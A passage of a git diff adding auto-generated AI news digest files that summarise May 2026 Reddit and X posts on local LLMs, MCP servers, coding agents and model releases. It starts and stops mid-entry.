learned](https://reddit.com/r/ClaudeAI/comments/1tf76wp/i_replicated_anthropics_generatorevaluator/) +*Reddit r/ClaudeAI* | 16/05/2026 | Score: 1.00 +Tags: mcp, cli_tool + +> Anthropic recently published their [harness design for long-running apps](https://www.anthropic.com/engineering/harness-design-long-running-apps) — a multi-agent architecture inspired by GANs where a Generator builds code and an Evaluator critiques it in a loop. I built my own version using Kiro CLI and used it to generate a marketing website for my project [Mnemo](https://github.com/Mnemo-mcp/Mnemo) (persistent memory for AI coding agents). **The architecture:** Planner (runs once) → Generator ↔ Evaluator (12 iterations) Each agent is a separate CLI process with zero shared context. They communicate only through files (spec.md, eval-report.md). The Evaluator uses Playwright to actually browse the live site — not just read code. **What made it work:** **Clean slate per invocation** — each agent starts fresh, reads only its input files. Prevents context anxiety. **Playwright MCP for testing** — the evaluator navigates, clicks, resizes viewports. Catches visual bugs code review never would. **Anthropic's frontend design skill** — explicitly penalizes generic AI patterns (Inter font, purple gradients, card layouts). Forces creative risk-taking. **Continuous iteration, not retry-on-fa… + +--- + +## [Interconnects newsletter reviews wave of open AI releasesOpen AI models saw a burst of new releases this month from several labs. The Interconnects newsletter reviewed five of them, including Gemma 4 and DeepSeek V4, using the CAISI V4 evaluation framework.](https://www.digg.com/ai/09imapy5?rank=7) +*Digg AI* | Score: 1.00 +Tags: product_launch, developer_tool + +--- + +## [How I started programming differently over the last year. What about you?](https://reddit.com/r/LocalLLaMA/comments/1tf2cxh/how_i_started_programming_differently_over_the/) +*Reddit r/LocalLLaMA* | 16/05/2026 | Score: 1.00 +Tags: cli_tool, agent_tool + +> An interesting observation: I’ve stopped using the LLM-powered autocomplete in my IDE. At first, it was one of the key features for me. It felt extremely convenient: you start writing a function in your code, and the LLM completes it based on common sense or the context from the open tabs. But the most interesting thing is that back when LLM autocomplete was useful and in demand, I had already written a script that could go through the source files, let me select what I needed, and prepare the context to feed into an LLM chat so it could tell me what to add or fix. I worked like that for about six months. And even that is gone now. These days it’s easier to open a CLI interface with a coding agent, without even launching the IDE. You describe what you need, use @ to point it to the files it should inspect or modify, and that’s it. Everything is changing at an absolutely insane speed. Basically, the only things I still use an IDE for are nice Git diff visualization, step-by-step debugging, and the ability to click on functions and jump into their implementation. In other words, code navigation. And even that functionality is only needed in about 5-10% of my work. It’s interesting t… + +--- + +## [LLM Phone Home: Reliable Apps that can deliver inference from local backend](https://reddit.com/r/LocalLLaMA/comments/1tez9sb/llm_phone_home_reliable_apps_that_can_deliver/) +*Reddit r/LocalLLaMA* | 16/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> Hello all, I’m wondering what suggestions there are for an ios app that can serve an openai compatible endpoint. I am using 3sparks which works GREAT for that specific use, BUT, there is no mcp, no web search, etc. I want to show people that a local model with web search on your phone is very impressive, but I can’t find an app that can mimic OWUI/LMS/etc. Texting Hermes works but I was hoping to find a solution that is not using a slow agent, just calling requests from local server. So far, I tried: Apollo, Locally AI, Noema, and 3 Sparks. Previously I have gone through other apps that run models in situ (in the iphone) but they don’t have remote endpoint usage. Noema seemed promising but Deepseek V4 Flash from my mac studio never makes it through a request (works great with 3 Sparks, but no web search or mcp capability). + +--- + +## [Frameo AI Launches Pixar-Style Short Films Powered by Seedance 2.0 — Native Audio, Multi-Shot, Director Mode](https://x.com/frameo_ai/status/2055642282796400821) +*Aligned News (Scoble)* | 16/05/2026 | Score: 1.00 +Tags: product_launch, tool_update + +> Frameo AI launched Pixar-quality short films on Seedance 2.0 with native audio and Director Mode, making cinematic AI video creation accessible to independent creative producers. + +--- + +## [How Do You Tell If Someone Is Good at Agents? — Scoble Asks the Question the AI Industry Cannot Answer](https://x.com/Scobleizer/status/2055566706714845328) +*Aligned News (Scoble)* | 16/05/2026 | Score: 1.00 +Tags: developer_tool, agent_tool + +> Scoble's question on evaluating agent development talent surfaces the unsolved hiring signal problem as companies scramble for AI agent skills with no reliable credential or assessment framework. + +--- + +## [Qwen3.6-35B-A3B and 9B are officially on the public Terminal-Bench 2.0 leaderboard!](https://reddit.com/r/LocalLLaMA/comments/1temio0/qwen3635ba3b_and_9b_are_officially_on_the_public/) +*Reddit r/LocalLLaMA* | 16/05/2026 | Score: 1.00 +Tags: open_source, cli_tool + +> Qwen3.6-35B-A3B and 9B are officially on the public Terminal-Bench 2.0 leaderboard! little-coder × Qwen3.6-35B-A3B hit 24.6% (±3.2), and **now land above Gemini 2.5 Pro on Gemini CLI (19.6%)** and Qwen3-Coder-480B on Terminus 2 (23.9%). I didn’t expect the scaffold-model gap from Polyglot to hold on a benchmark this hard but it did! little-coder × Qwen3.5-9B came in at 9.2% which is more humble. Yet, it also shows again that **sub-10B local models are now measurable on a hard agentic benchmark**, not assumed unworthy of a slot. Just felt it was right to follow up here as you requested, and say a genuine thanks to this community. It really is the place currently driving innovation toward less compute, and this run exists there because you pushed for it. Now it’s time to head for the top of the leaderboard 👀 let’s go open source! + +--- + +## [Claude in Chrome extension stopped working in claude.ai after using Claude Code — anyone else?](https://reddit.com/r/ClaudeAI/comments/1teudps/claude_in_chrome_extension_stopped_working_in/) +*Reddit r/ClaudeAI* | 16/05/2026 | Score: 0.88 +Tags: developer_tool, cli_tool + +> Hey everyone, running into a weird issue and hoping someone has seen this before. A few hours ago, Claude in Chrome was working fine in the claude.ai web app. Then I started using Claude Code (CLI) with the \`--chrome\` flag, which connected to the extension no problem. Ever since, the extension refuses to connect from claude.ai — but it still works fine from Claude Code and the extension itself appears active and logged in. \*\*Setup:\*\* \- Claude in Chrome extension installed and signed in \- Same account on [claude.ai](http://claude.ai) and Claude Code \- Extension shows as active in Chrome toolbar \*\*What works:\*\* \- ✅ Claude Code CLI (\`claude --chrome\`) connects to the browser fine \- ✅ Extension itself appears active and logged in \- ❌ [claude.ai](http://claude.ai) web app: consistently returns "Browser extension is not connected" \*\*What I've already tried (nothing helped):\*\* \- Restarted Chrome \- Restarted PC \- Logged out and back into [claude.ai](http://claude.ai) \- Disabled and re-enabled the extension My theory: once Claude Code connected to the extension, it somehow "claimed" the connection and the [claude.ai](http://claude.ai) web app can no longer get thr… + +--- + +## [Free Premiere Pro extension to download YouTube/Instagram/X videos and auto-import to your project bin](https://reddit.com/r/ClaudeAI/comments/1tf20ta/free_premiere_pro_extension_to_download/) +*Reddit r/ClaudeAI* | 16/05/2026 | Score: 0.78 +Tags: open_source, developer_tool + +> Tired of the whole workflow — open browser, find video, download, wait, drag into Premiere. So I built a panel that does it all from inside Premiere. Paste a URL, pick quality, click Download & Import — file lands directly in your project bin. Supports: \- YouTube, Instagram, X/Twitter \- Best / 1080p / 720p / 480p / MP3 \- Live progress bar with ETA \- Auto-import to project bin on finish Powered by yt-dlp under the hood. Built this with the help of Claude (AI) — had the idea and kept iterating until it worked. Free & open source: [https://github.com/gitttsarya/media-fetcher-premiere](https://github.com/gitttsarya/media-fetcher-premiere) Full install guide in the README. Let me know if you run into any issues! https://preview.redd.it/y5svnpjuoj1h1.png?width=482&format=png&auto=webp&s=0dfb391daefb06dbbb37c4b13174efc6a1ca7a22 + +--- + +## [Using Claude chat for making Apps.](https://reddit.com/r/ClaudeAI/comments/1teum62/using_claude_chat_for_making_apps/) +*Reddit r/ClaudeAI* | 16/05/2026 | Score: 0.78 +Tags: api_update, cli_tool + +> I have been using Claude chat to build structural engineering calculation apps, and it has worked very well for me. Claude generates the files, and I host the projects on GitHub. To avoid hitting the context window limit, I periodically start new chat sessions. When I do, I download the ZIP file from GitHub (including the MD file), and paste it into the new chat so Claude has the project context again. I was wondering if there are any drawbacks to working this way. I do not use Claude Code (don’t have coding background )or the terminal much. I tried it once but did not really like the workflow. Most of my coding is done on the go through the chat interface on my phone or on my computer at work and at home. + +--- + diff --git a/data/digest-2026-05-17.md b/data/digest-2026-05-17.md new file mode 100644 index 0000000..94e8b0c --- /dev/null +++ b/data/digest-2026-05-17.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-05-17** | 15 stories | Auto-generated from 420 archived stories + +--- + +## [I built SeeFlow - architecture diagrams that actually run, wired to your live app](https://reddit.com/r/ClaudeAI/comments/1tfd6j6/i_built_seeflow_architecture_diagrams_that/) +*Reddit r/ClaudeAI* | 17/05/2026 | Score: 1.00 +Tags: mcp, open_source, developer_tool, tool_update + +> Architecture diagrams rot. You spend an afternoon in Confluence, three months later it's wrong, and nobody updates it because there's no forcing function. https://preview.redd.it/9svmg8ih3m1h1.png?width=2508&format=png&auto=webp&s=0d06df1f82fd417ee9a45e504efd26628eaf33fd SeeFlow tries to fix that by making diagrams executable. It generates a flow canvas from your codebase, then wires each node to your actual running app. There's a Claude Code / Codex/ Cursor / Windsurf plugin that does the heavy lifting: >/seeflow show me the shopping cart feature It also ships an MCP server so any MCP-aware editor can register and edit demos without leaving the IDE. Link to the site: [https://seeflow.dev](https://seeflow.dev) 100% Free/ MIT Open Source + +--- + +## [ROCm 7.13 nightly adds strix halo optimizations](https://reddit.com/r/LocalLLaMA/comments/1tftg09/rocm_713_nightly_adds_strix_halo_optimizations/) +*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 +Tags: product_launch, open_source, tool_update + +> [https://www.phoronix.com/news/ROCm-7.13-Released](https://www.phoronix.com/news/ROCm-7.13-Released) Quote: ...new optimizations for Ryzen AI Max 300 "Strix Halo" and the ROCprof Trace Decoder is now open-source...<snip>... Those rolling from source can grab the ROCm 7.13 Tech Preview via [TheRock on GitHub](https://github.com/ROCm/TheRock/releases/tag/therock-7.13). [https://rocm.docs.amd.com/en/7.13.0-preview/about/release-notes.html](https://rocm.docs.amd.com/en/7.13.0-preview/about/release-notes.html) Trivia: Rocm name origin: radeon open compute module + +--- + +## [I updated my tool that turns any book into character & landscape images using RAG + ComfyUI/Gemini — now with Locations support!](https://reddit.com/r/StableDiffusion/comments/1tfro2h/i_updated_my_tool_that_turns_any_book_into/) +*Reddit r/StableDiffusion* | 17/05/2026 | Score: 0.78 +Tags: api_update, open_source, tool_update + +> Hey everyone! I am back with an update to my character generation tool. I got some great feedback when I posted it here, I am pleased to announce that I have integrated a lot of requested features and added a lot more ! **Big thanks to everyone who tried the tool from the first post and gave valuable suggestions !** All the updates and features for just 2.99 a month ! No, just kidding, still fully open source. **Image gallery -** Modern Dracula adaptation, plus some characters from the Eye of the world ( which inspired this whole project ). Tool screenshots at the end. # What's new in this update? # 🔧 QoL updates ! Configurable .env file, api endpoints for Ollama, OpenAI etc, database for books generated, character details saved after generation, image gallery, prompt save feature, installer, updated UI, support for epub/text, Gemini image integration, collapsible sidebars, task manager widget, debug panel to test connections or databases, and tons more # 📍 Locations Tab — "The one I didn't know I needed" This was the exciting one. You can now generate **landscape/architectural images** for prominent locations in the book — not just characters. * Click **"Extract Locations from… + +--- + +## [Are local models good enough yet for AI meeting memory?](https://reddit.com/r/LocalLLaMA/comments/1tfukyl/are_local_models_good_enough_yet_for_ai_meeting/) +*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 +Tags: mcp, tool_update + +> I’ve been testing different ways to handle AI meeting notes and realized the most useful part isn’t the summary, it’s having searchable context from past meetings later. Right now I’m using Bluedot because it handles capture really well, transcripts, summaries, action items, recordings, all searchable after. The new Claude MCP integration made me realize how valuable meeting history becomes once you can actually query it naturally. Are you building local AI meeting memory setups, or are cloud tools still way ahead for this use case? + +--- + +## [NeuralCompanion](https://reddit.com/r/StableDiffusion/comments/1tftqwg/neuralcompanion/) +*Reddit r/StableDiffusion* | 17/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> NeuralCompanion is an open-source, local-first AI companion project for people who like building, experimenting, and seeing how far personal AI can go on their own hardware. It brings together realtime voice chat, local LLMs, TTS/STT, image generation, interactive tutorials, API-friendly workflows, and a modular addon system into one desktop app designed to be flexible, hackable, and genuinely fun to explore. NC also supports avatar systems and avatar engines like VSeeFace, VAM/VAM2, and other experimental realtime avatar workflows. It is still experimental and a little rough around the edges in places, but that is part of the project. The goal is not to make another locked-down corporate assistant. It is to build a customizable AI companion platform you can actually run, modify, and shape yourself. If you are into local AI, creative tools, avatars, plugins, voice interfaces, automation, or weird future-facing software, come take a look. GitHub: [https://github.com/Rakile/NeuralCompanion](https://github.com/Rakile/NeuralCompanion) Discord: [https://discord.com/invite/UqnwX46rcK](https://discord.com/invite/UqnwX46rcK) Developers, tinkerers, artists, AI enthusiasts, and curious peop… + +--- + +## [Made a simple template manager and GUI for llama.cpp so I don't have to keep memorizing CLI flags.](https://reddit.com/r/LocalLLaMA/comments/1tfqrbt/made_a_simple_template_manager_and_gui_for/) +*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 +Tags: product_launch, cli_tool + +> [Introducing Hexllama](https://reddit.com/link/1tfqrbt/video/uobdgqq1hp1h1/player) Hey, I’ve always found **llama-server** to be more than enough for testing out local models, mostly because it guarantees you always have the absolute latest llama.cpp features and architecture support. But keeping track of different CLI commands, context sizes, and batch settings for different models was becoming a massive headache. Plus, managing multiple terminal tabs when I wanted to run two models at once was annoying. So, I built **Hexllama**. It's a fast desktop interface that gets out of your way and just makes managing llama.cpp easier. No walled gardens, just a clean wrapper. **What it actually does:** * **Template-Based Execution:** You configure your CLI flags (threads, context, etc.) once via a visual editor, save it as a template, and from then on it’s just one click to run. * **Built-in llama.cpp Version Manager:** This is the feature I use the most. It auto-checks the ggml-org repo, lets you download new releases directly in the app, and lets you swap backends instantly (super useful when a new model architecture drops and needs a specific build). * **Integrated HF Downloader:** Sear… + +--- + +## [Kimi K 2.6 is good and can get free api keys from Nvidia integrate with aider launch in powershell and you got something same as claude code for testing new ideas before paying for claude subscription](https://x.com/lordsa_m/status/2055959075012104631) +*X search / AI model updates* | 17/05/2026 | Score: 1.00 +Tags: api_update, cli_tool + +> Kimi K 2.6 is good and can get free api keys from Nvidia integrate with aider launch in powershell and you got something same as claude code for testing new ideas before paying for claude subscription + +--- + +## [Is there a new Wan2.2 lightx2v (20260412) FP8 version for ComfyUI?](https://reddit.com/r/StableDiffusion/comments/1tfkwx7/is_there_a_new_wan22_lightx2v_20260412_fp8/) +*Reddit r/StableDiffusion* | 17/05/2026 | Score: 1.00 +Tags: github_release, tool_update + +> I decided to check the `lightx2v` Hugging Face account and noticed they released an updated version of their distilled Wan2.2 i2v A14b model about a month ago. They uploaded a new version 20260412 on Hugging Face, "Wan2.2-Distill-Models" repository. (Can't post a link because Reddit filters block the post) However, they only uploaded the FP32 version, which is also incompatible with ComfyUI. I can't find a converted version via Google or Hugging Face search. Does anyone know how to convert this model to FP8, or would someone be willing to convert it and upload it? + +--- + +## [Jackrong/Qwopus3.5-9B-Coder-GGUF · Hugging Face](https://reddit.com/r/LocalLLaMA/comments/1tfin40/jackrongqwopus359bcodergguf_hugging_face/) +*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 +Tags: open_source, agent_tool + +> >**Qwopus3.5-9B-coder** is specially optimized and fine-tuned for high-performance **🤖 Agentic Coding, complex Tool Calling, and logical reasoning.** >*💡* ***Why the 9B Dense Model?*** *We believe that the 9B dense architecture represents the perfect* ***"sweet spot"*** *for large language models. It runs seamlessly at 8-bit precision on entry-level 16GB RAM devices—such as standard laptops and the Mac mini—making it exceptionally lightweight yet highly versatile. Without requiring expensive hardware, it allows you to achieve excellent performance paired with impressive inference speeds. Simply put,* ***Qwen3.5-9B is currently the best open-source model in its class.*** # 🛠 Training Strategy The fine-tuning process of this model deeply integrates **Trace Inversion** data augmentation technology with high-quality **Agent Traces**. This systematic approach not only strengthens the model's ability to solve complex programming tasks, but also greatly improves its logical coherence and accuracy when using various tools. This model is designed specifically for the following goals: * 🧩 More structured and stronger logical reasoning capabilities, reducing repetitive thinking * �… + +--- + +## [2026.5.16 released. Highlights: - xAI Grok via SuperGrok OAuth provides 1M token context window - OpenAI‑compatible local proxy allows any OAuth‑authored provider to speak the OpenAI API Full release notes:](https://x.com/OliverB72157882/status/2055972796711502049) +*X search / AI model updates* | 17/05/2026 | Score: 0.98 +Tags: api_update, tool_update + +> 2026.5.16 released. Highlights: - xAI Grok via SuperGrok OAuth provides 1M token context window - OpenAI‑compatible local proxy allows any OAuth‑authored provider to speak the OpenAI API Full release notes: + +--- + +## [I ran 100 Claude + Codex sessions in parallel to understand what I'm doing wrong in marketing my open source "Claude Command Center". Here's the playbook they came up with.](https://reddit.com/r/ClaudeAI/comments/1tfbxmf/i_ran_100_claude_codex_sessions_in_parallel_to/) +*Reddit r/ClaudeAI* | 17/05/2026 | Score: 0.94 +Tags: open_source, tool_update + +> A week ago I launched my open-source project (Claude Control Center) on this subreddit. Got 0 upvotes. Dead in 5 hours. :) \[The app is awesome - great way to manage multiple sessions and avoid waiting on top of Claude + Codex - try it :) [git:amirfish1/ccc](http://github.com/amirfish1/claude-command-center) . So I spawned **100 Claude + Codex agents** in parallel and asked them to figure out what I did wrong (It had two hours left on my weekly Claude limit and 20% left - tried to think of good use :) ) . 30 minutes and 100 artifacts later, they handed me back a playbook. https://reddit.com/link/1tfbxmf/video/0mi1ytksol1h1/player The headline finding: stars don't come from better code. They come from: marketing surface. Tagline, demo GIF, founder credential, hosted landing page, multi-shot Hacker News, awesome-list inclusion. The system found that gap on its own - I never told it to study marketing. 5-min video walking through the 7 findings + what the agents drafted (Show HN body, X thread, LinkedIn post, channel plan): [https://youtu.be/Tm2svTe\_Ed4](https://youtu.be/Tm2svTe_Ed4) The video itself - is \*ON PURPOSE\* 100% built by the AI who created the agents \[happy to share th… + +--- + +## [Claude Code context-window: /clear after EVERY task in the codebase or are there edge cases?](https://reddit.com/r/ClaudeAI/comments/1tfnqmc/claude_code_contextwindow_clear_after_every_task/) +*Reddit r/ClaudeAI* | 17/05/2026 | Score: 0.54 +Tags: api_update, cli_tool + +> So I have been recently coding a bunch with the following setup: I am launching Claude Code CLI inside of my repo (a complete shopify theme; if you are unfamiliar it is 3-8mb of source code, structurally something like this: `layout/ 2–3 files (theme.liquid = root shell)` `templates/ 15–25 files (one per page type, JSON or liquid)` `sections/ 30–50 files (reusable page blocks)` `snippets/ 20–40 files (sub-components, like partials)` `assets/ 30–60 files (css, js, svgs)` `locales/ 5–10 files (i18n JSON)` `config/ 2 files (settings_schema.json = theme editor config)` ) I also have an app set up that shows, what the current usage of the models context windows is currently at in %. **Recently I have been wondering: say I give claude quite a heavy task that involves the typical stack of 3 files (1 .js, 1 .liquid and 1 .css) and this instantly bumps up the context window from 0% to 10%, is there a golden rule that one should always do /clear after such an extensive task or does it depend if say, the next task depends on the same 3 files?** Do you guys have any advice on when the perfect time is to /clear? What are your experiences with this? Do you know of any addons that could facilita… + +--- + +## [LLM's on Android (Snapdragon 8 Elite) MOE Experience](https://reddit.com/r/LocalLLaMA/comments/1tg3ssd/llms_on_android_snapdragon_8_elite_moe_experience/) +*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 +Tags: developer_tool + +> So I bought a phone with Snapdragon 8 elite (gen 4) and 24GB ram (Honor magic 7 pro). My experience has been mixed but with solid potential. Hexagon (Snapdragon 8 Elite) NPU and OpenclGPU support and updates have been rolling in fast but still the fastest prompt processing and token generation have mostly been CPU (I would bet that soon enough either NPU or GPU will be faster or more realistically both). CPU has the downside of generating more heat than NPU and GPU inference but overall it's still the fastest **currently**. Now there are no phones with 32gb ram without a virtual ram extension which doesn't work with LLM's ofc, so the best you will do is 24gb ram. What can you do with 24gb ram and a smartphone processor though? Quite a lot actually, MOE has been getting quite popular and their Q4 quants of these models are great and fit into the 24GB. My personal recommendation is IQ4\_XS and MXFP4\_MOE since with what I have tested MXFP4\_MOE is quite faster but for the size IQ4\_XS can't be beaten. Q4\_0 is more optimised but quality wise it's worse than both (subjectively from my own experience). Goes without saying but Q4\_K\_M is also quite reliable from a speed/quality/size s… + +--- + +## [While waiting for Fara-1.5 for my coding harness](https://reddit.com/r/LocalLLaMA/comments/1tg3kbz/while_waiting_for_fara15_for_my_coding_harness/) +*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 +Tags: agent_tool + +> Hi all, Not sure many people are aware so wanted to give a word about [Fara-1.5 release](https://www.microsoft.com/en-us/research/video/magenticlite-a-full-stack-agentic-experience-powered-by-small-models/). => this release will likely be the big sister of [Fara-7B](https://huggingface.co/bartowski/microsoft_Fara-7B-GGUF) and built on top of Qwen3.5 Actual Fara-7B performs not bad at all but actually requires a proper implementation, and I really hope the 1.5 will be SOTA, in different (including smaller) versions, and may simplify all the pipeline! I gave my coding agent harness extra built-in features: * browser automation tool allowing navigation either via accessibility tree only (CDP / DOM) or via vision + grounding (the above video uses Qwen3.6 35B + Fara-7B) * the possibility to generate prefilled "skills" directly from conversation history + Jobs to schedule auto-run * recording from user actions (requires vllm for video and maybe llama.cpp following [this PR](https://github.com/ggml-org/llama.cpp/pull/21858)?) Feel free to have a look at the project, it is focused on controllability and low context footprint: [https://github.com/leflakk/openclose](https://github.com/le… + +--- + +## [Pushing the limit: minimax m2.7 q8_0 128k on 2x3090, 256GB DDR4](https://reddit.com/r/LocalLLaMA/comments/1tg37t6/pushing_the_limit_minimax_m27_q8_0_128k_on_2x3090/) +*Reddit r/LocalLLaMA* | 17/05/2026 | Score: 1.00 +Tags: agent_tool + +> CPU is just a secondhand 10900x. Using 128k context, unquantized kv cache. Model is at q8\_0 to mitigate some weird behavior I was seeing at lower quants. Speed is very slow at around 50tps pp, 10tps tg, but usable for coding agent workflows. Anybody else running MoE models in this size class on relatively low-end hardware? For my purposes, speed is less important than accuracy, as long as it's not like literally all day. Any other models you'd recommend I'd try or additional optimization tips that could help within my constraints? I wish they'd released the draft model for MTP on this model but it looks like they declined to do so for 2.7. My ik\_llama flags -- sorry for the funny formatting, this is pasted out of my vibe coded NixOS config: "${ik-llama-cuda}/bin/llama-server" + " -m ${modelPath}" + " --host 0.0.0.0" + " --port ${toString cfg.port}" + " -c ${toString cfg.contextLength}" + " -ngl 999" + " --cpu-moe" + " -sm graph" + " -fa on" + " -t 16" + " -tb 16" + " -b 4096" + " -ub 4096" + " -np 1" + " -muge" + " -ger" + " --jinja" + " --metrics" + " --temp 1.0" + " --top-p 0.95" + " --top-k 40" + " --min-p 0.01" + +--- + diff --git a/data/digest-2026-05-18.md b/data/digest-2026-05-18.md new file mode 100644 index 0000000..cdc188c --- /dev/null +++ b/data/digest-2026-05-18.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-05-18** | 15 stories | Auto-generated from 665 archived stories + +--- + +## [obsidian-mcp-server: v3.2.0 Released](https://reddit.com/r/ClaudeAI/comments/1tg692a/obsidianmcpserver_v320_released/) +*Reddit r/ClaudeAI* | 18/05/2026 | Score: 1.00 +Tags: api_update, mcp, product_launch, developer_tool + +> [obsidian-mcp-server](https://github.com/cyanheads/obsidian-mcp-server) [3.2.0](https://github.com/cyanheads/obsidian-mcp-server/releases/tag/v3.2.0) adds an `omnisearch` mode to `obsidian_search_notes` (BM25-ranked, typo-tolerant, PDF + OCR via the [Omnisearch](https://github.com/scambier/obsidian-omnisearch) and [Text Extractor](https://github.com/scambier/obsidian-text-extractor) plugins), MCP-spec cursor pagination across all search modes, and a `nameRegex` filter on `obsidian_list_commands`. Recent Releases: [v3.1.11](https://github.com/cyanheads/obsidian-mcp-server/releases/tag/v3.1.11) brought the same `nameRegex` filter to `obsidian_list_tags`, and [v3.1.10](https://github.com/cyanheads/obsidian-mcp-server/releases/tag/v3.1.10) added server-level instructions on the MCP `initialize` response. Note: The HTTP endpoint in Omnisearch is disabled by default. You must enable it in the Omnisearch plugin settings. Let me know if you have any questions/issues! + +--- + +## [Witchcraft, fast local semantic search on top of SQLite [P]](https://reddit.com/r/MachineLearning/comments/1tgqyo8/witchcraft_fast_local_semantic_search_on_top_of/) +*Reddit r/MachineLearning* | 18/05/2026 | Score: 1.00 +Tags: api_update, open_source, cli_tool + +> **Witchcraft (https://github.com/dropbox/witchcraft)**, an open source project that I built at Dropbox, is a from-scratch re-implementation of Stanford's XTR-Warp semantic search engine ( [https://github.com/jlscheerer/xtr-warp](https://github.com/jlscheerer/xtr-warp) ) in safe rust, using a single-file SQLite database as backing storage, making it suitable for client-side deployment. It runs completely stand-alone on your device, needs no API keys, no vector database, no chunking strategy, no fancy re-rankers, and it is lightning fast (20ms p.95 end-to-end search latency on NFCorpus, at 33% NDCG@10, on an Apple Macbook Pro M2 Max, more than twice as fast as the original XTR-WARP on server-class hardware, at similar accuracy.) The project also includes **Pickbrain**, a CLI that indexes your Claude Code and OpenAI Codex session transcripts, memory files, and authored documents into a Witchcraft database for fast semantic search. Ever wondered "what was that conversation where I fixed the auth middleware?" — pickbrain finds it, and lets you resume the session directly. There is also a /pickbrain skill for both Claude and Codex, which equips those tools with global memory across all… + +--- + +## [I built an open-source VS Code extension to visualize and debug Claude Code sessions in real-time](https://reddit.com/r/ClaudeAI/comments/1tgj45v/i_built_an_opensource_vs_code_extension_to/) +*Reddit r/ClaudeAI* | 18/05/2026 | Score: 0.86 +Tags: open_source, developer_tool, cli_tool + +> Hey everyone! Running Claude Code in the terminal is amazing, but I hated the "black box" feeling of not knowing exactly what the agent was doing behind the scenes, or when it got stuck in an infinite loop. To solve this, I built \*\*Argus\*\* — an open-source visual debugger and observability tool for Claude Code right inside VS Code. Key features: \* \*\*Real-time Timeline:\*\* Streams the JSONL transcripts instantly to show agent steps (Bash, Read, Write, WebFetch). \* \*\*Dependency Graph:\*\* Visually maps out which files the agent is touching and how they connect. \* \*\*Cost & Loop Detection:\*\* Caught a few duplicate reads and retry loops that were burning tokens unnecessarily. It’s completely open-source (MIT) and lightweight. I’d love to hear your feedback on the architecture or features you'd like to see next! GitHub: [https://github.com/yessGlory17/argus](https://github.com/yessGlory17/argus) + +--- + +## [Lemonade v10.5.1: an MTP + ROCm 7.13 quick start for Strix Halo](https://reddit.com/r/LocalLLaMA/comments/1th0z6k/lemonade_v1051_an_mtp_rocm_713_quick_start_for/) +*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Update to Lemonade v10.5.1, then: ``` # Get the model lemonade pull Qwen3.6-27B-MTP-GGUF # Get ROCm 7.13 lemonade backends install llamacpp:rocm # Load the model (MTP args auto-applied) lemonade load Qwen3.6-27B-MTP-GGUF --llamacpp rocm --ctx-size 0 ``` Shown in the video taking a look in the mirror with the help of Pi agent. Github: https://github.com/lemonade-sdk/lemonade Discord: https://discord.gg/5xXzkMu8Zk PS. u/lucifer-vali fixed Fedora 43 support in this release as well :) + +--- + +## [OpenAI Flex and Priority service tiers are now available for supported OpenAI models, including GPT-5.5. Use Flex for lower-cost requests when latency is less important, or Priority for higher-priority processing when you need it. In the A…](https://x.com/NanoGPTcom/status/2056425379171058008) +*X search / AI model updates* | 18/05/2026 | Score: 1.00 +Tags: api_update, product_launch + +> OpenAI Flex and Priority service tiers are now available for supported OpenAI models, including GPT-5.5. Use Flex for lower-cost requests when latency is less important, or Priority for higher-priority processing when you need it. In the API, set service_tier to "flex" or + +--- + +## [Tried every Hermes Agent alternative so you don't have to (2026 roundup)](https://reddit.com/r/LocalLLaMA/comments/1tgsttq/tried_every_hermes_agent_alternative_so_you_dont/) +*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> Been running Hermes since launch. Love it. But a few people on my team can't get past the setup, and honestly the security situation with some of these self-hosted agents has gotten complicated enough that I put together a proper comparison. Eleven alternatives, split into OSS and managed. Quick take on each: **Open Source** **OpenClaw** is the obvious first stop. 347k GitHub stars, 24+ platform integrations, massive skill library. The security track record is genuinely rough though. 9 CVEs in four days in March, \~20% of ClawHub packages flagged as malicious by independent audits. Use it but harden it first. **TrustClaw** is what OpenClaw should have been from a security standpoint. OAuth only, sandboxed execution, 20k+ managed integrations. You give up some control but your credentials actually stay safe. **PicoClaw** is absurd in the best way. Go binary, under 10MB, runs on $10 hardware, boots in under a second. Still pre-1.0 but if you need something lean it's hard to argue with. **ZeroClaw** is the Rust rewrite. 3.4MB binary, sub-10ms startup, minimal dependencies. Not trying to be feature-rich. Just trying to stay running. **nanobot** is \~4000 lines of Python you can actual… + +--- + +## [Configuration Qwen3.6-35b-a3b (12Gb VRAM)](https://reddit.com/r/LocalLLaMA/comments/1tgrk75/configuration_qwen3635ba3b_12gb_vram/) +*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 +Tags: api_update, agent_tool + +> Has anyone here tested different KV cache quantizations and compared their performance? I’m currently using the model in Q5\_K\_M with Q4 KV cache on a 12 GB VRAM GPU. With this setup, I’m offloading about 27 MoE layers to the CPU and getting around 90–100 tok/s with a 128k context window. I’m trying to see if I can push it a bit further, since I’m using it inside my own AI agent. The model is already pretty smart, but in agentic workflows it’s not always as strong or consistent as I’d like. I’d be curious to know what KV quantization settings people are using, and how much difference they noticed in speed, memory usage, and output quality. Also, would you recommend trying a different model quantization than Q5\_K\_M for this setup? For example, would Q4\_K\_M, Q6\_K, or another quant be a better trade-off for speed, VRAM usage, and reasoning quality? + +--- + +## [Qwen 35b a3b surprises me](https://reddit.com/r/LocalLLaMA/comments/1tgqpa8/qwen_35b_a3b_surprises_me/) +*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 +Tags: open_source, agent_tool + +> Just wanted to share that I'm pretty happy about Qwen 35b a3b agentic coding performance. I'm running the model in q80 quant, kv cache both q8\_0 as well, with 262144 in 4090 + 5060 ti, via llama.cpp backend with claude code pointing to localhost. For demo/data analytics purposes, it works pretty well. I haven't used it for large codebases, but it definitely is better than gemma4 26b in my use case. One thing that surprises me is that it seems to get better outcome in agentic coding, than chat. When using it with just chat UI, i found the code qwen35b provide a bit too clunky. I wonder of others have compared its performance against open source harnesses (Pi / opencode). + +--- + +## [xAI Launches Grok Build — Three-Way Coding War Is Now 